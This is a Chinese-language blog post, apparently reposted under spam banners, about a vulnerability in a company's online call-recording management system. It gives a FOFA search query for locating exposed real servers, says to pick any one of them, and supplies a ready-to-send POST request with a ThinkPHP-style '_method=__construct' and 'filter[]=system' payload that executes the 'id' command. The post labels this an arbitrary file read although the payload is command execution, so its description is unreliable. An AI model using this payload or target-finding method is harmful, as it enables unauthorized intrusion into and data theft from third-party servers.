柚子快報(bào)激活碼778899分享：安全 任意文件讀取漏洞

http://yzkb.51969.com/

? ? ? 申甌通信設(shè)備有限公司在線錄音管理系統(tǒng) index.php接口處存在任意文件讀取漏洞，惡意攻擊者可能利用該漏洞讀取服務(wù)器上的敏感文件，例如客戶記錄、財(cái)務(wù)數(shù)據(jù)或源代碼，導(dǎo)致數(shù)據(jù)泄露。我們?nèi)ofa中用如下語法進(jìn)行搜索

title="在線錄音管理系統(tǒng)"

開啟抓包后任意訪問其中一個(gè)網(wǎng)站

將數(shù)據(jù)包右鍵發(fā)送到重放器，并將其替換為如下數(shù)據(jù)包，其中127.0.0.1位置為訪問的ip地址

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Content-type: application/x-www-form-urlencoded

Cache-Control: no-cache

Pragma: no-cache

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

Connection: close

Content-Length: 52

s=id&_method=__construct&method=POST&filter[]=system

然后點(diǎn)擊發(fā)送，即可看到查詢的內(nèi)容

柚子快報(bào)激活碼778899分享：安全 任意文件讀取漏洞

http://yzkb.51969.com/

精彩文章